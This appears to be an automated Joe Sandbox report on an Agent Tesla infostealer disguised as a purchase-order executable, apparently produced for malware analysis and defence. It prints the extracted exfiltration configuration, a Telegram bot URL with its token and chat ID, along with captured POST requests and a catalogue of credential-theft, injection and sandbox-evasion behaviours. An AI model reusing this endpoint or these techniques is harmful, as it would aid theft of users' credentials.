Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-inv-CQV20(92315).exe

Overview

General Information

Sample name:PO-inv-CQV20(92315).exe
Analysis ID:1431985
MD5:4e62c4b92779d99998cd908a0966bf7d
SHA1:e02dc74baae821c91f12c890db595f9b08db418c
SHA256:3c54f1e2d58d392a6bcd2e6c836d1479888e3c334b8e6f5511a65bc1506681fb
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PO-inv-CQV20(92315).exe (PID: 5040 cmdline: "C:\Users\user\Desktop\PO-inv-CQV20(92315).exe" MD5: 4E62C4B92779D99998CD908A0966BF7D)
    • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jsc.exe (PID: 5868 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
    • jsc.exe (PID: 6412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
    • WerFault.exe (PID: 5024 cmdline: C:\Windows\system32\WerFault.exe -u -p 5040 -s 1080 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendMessage?chat_id=1469090678"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.3307185247.0000000002AFA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.3307185247.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              Click to see the 15 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              3.2.jsc.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                3.2.jsc.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  3.2.jsc.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    3.2.jsc.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x332ea:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x3335c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x333e6:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x33478:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x334e2:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x33554:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x335ea:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x3367a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 15 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:04/26/24-07:39:59.187251
                      SID:2851779
                      Source Port:49699
                      Destination Port:443
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendMessage?chat_id=1469090678"}
                      Source: jsc.exe.5868.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendMessage"}
                      Multi AV Scanner detection for submitted file
                      Source: PO-inv-CQV20(92315).exeReversingLabs: Detection: 25%
                      Source: PO-inv-CQV20(92315).exeVirustotal: Detection: 22%Perma Link

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 00000000.00000002.2147294596.00000233470CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO-inv-CQV20(92315).exe PID: 5040, type: MEMORYSTR
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49699 version: TLS 1.2
                      Source: PO-inv-CQV20(92315).exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: mscorlib.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.ni.pdbRSDS source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.Core.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.ni.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: System.Core.ni.pdb source: WERD8AB.tmp.dmp.7.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WERD8AB.tmp.dmp.7.dr

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.6:49699 -> 149.154.167.220:443
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: POST /bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc65c412473d6cHost: api.telegram.orgContent-Length: 924Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc65c412473d6cHost: api.telegram.orgContent-Length: 924Expect: 100-continueConnection: Keep-Alive
                      Source: jsc.exe, 00000003.00000002.3307185247.0000000002AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: jsc.exe, 00000003.00000002.3307185247.0000000002AE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: jsc.exe, 00000003.00000002.3307185247.0000000002AE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000003.00000002.3304934889.0000000000402000.00000040.00000400.00020000.00000000.sdmp, jsc.exe, 00000003.00000002.3307185247.0000000002A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/
                      Source: jsc.exe, 00000003.00000002.3307185247.0000000002AE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7017233680:AAEfWTUjfiK5hxLLRkmgitv57SQZuFap4nQ/sendDocument
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49699 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, cPKWk.cs.Net Code: _6nIssCpGn
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.raw.unpack, cPKWk.cs.Net Code: _6nIssCpGn

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD348925280_2_00007FFD34892528
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD348A4C620_2_00007FFD348A4C62
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD3489BC900_2_00007FFD3489BC90
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD3489FCCD0_2_00007FFD3489FCCD
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD348946000_2_00007FFD34894600
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD348995B00_2_00007FFD348995B0
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD348995A80_2_00007FFD348995A8
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD3489DA700_2_00007FFD3489DA70
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD348910300_2_00007FFD34891030
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD348973900_2_00007FFD34897390
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD348967C80_2_00007FFD348967C8
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD3489AD180_2_00007FFD3489AD18
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD348A45590_2_00007FFD348A4559
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD348988B80_2_00007FFD348988B8
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD348A4CAF0_2_00007FFD348A4CAF
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD348988D00_2_00007FFD348988D0
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD348988C80_2_00007FFD348988C8
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD34899D5D0_2_00007FFD34899D5D
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD3489AA6A0_2_00007FFD3489AA6A
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD34898EA50_2_00007FFD34898EA5
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD34899F7C0_2_00007FFD34899F7C
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD348A03950_2_00007FFD348A0395
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD34970E290_2_00007FFD34970E29
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeCode function: 0_2_00007FFD3497026B0_2_00007FFD3497026B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_00F693383_2_00F69338
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_00F64A483_2_00F64A48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_00F69BC03_2_00F69BC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_00F6CD803_2_00F6CD80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_00F63E303_2_00F63E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_00F641783_2_00F64178
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_05F087803_2_05F08780
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_05F026F03_2_05F026F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_05F096E03_2_05F096E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_05F000403_2_05F00040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_05F03B403_2_05F03B40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_05F052C03_2_05F052C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_05F02E383_2_05F02E38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_05F0B8F03_2_05F0B8F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_05F04BE03_2_05F04BE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_0604D6913_2_0604D691
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_0604A78C3_2_0604A78C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_060491583_2_06049158
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_0604BB103_2_0604BB10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 3_2_00F69BB83_2_00F69BB8
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5040 -s 1080
                      Source: PO-inv-CQV20(92315).exeStatic PE information: No import functions for PE file found
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000000.2065470617.0000023344F62000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIpatananepa> vs PO-inv-CQV20(92315).exe
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea92d6c53-8566-4702-b054-93db855986ee.exe4 vs PO-inv-CQV20(92315).exe
                      Source: PO-inv-CQV20(92315).exe, 00000000.00000002.2148520958.0000023356C97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameItewiyozimiqF vs PO-inv-CQV20(92315).exe
                      Source: PO-inv-CQV20(92315).exeBinary or memory string: OriginalFilenameIpatananepa> vs PO-inv-CQV20(92315).exe
                      Source: 3.2.jsc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356d0ef50.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: PO-inv-CQV20(92315).exe, -----.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.PO-inv-CQV20(92315).exe.23356cd4508.1.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@7/5@1/1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMutant created: NULL
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5040
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
                      Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\ff095067-8d2e-40a2-96fb-8d89a2341dc8Jump to behavior
                      Source: PO-inv-CQV20(92315).exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: PO-inv-CQV20(92315).exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: PO-inv-CQV20(92315).exeReversingLabs: Detection: 25%
                      Source: PO-inv-CQV20(92315).exeVirustotal: Detection: 22%
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeFile read: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\PO-inv-CQV20(92315).exe "C:\Users\user\Desktop\PO-inv-CQV20(92315).exe"
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5040 -s 1080
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\PO-inv-CQV20(92315).exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: wintypes.dllJump to behavior
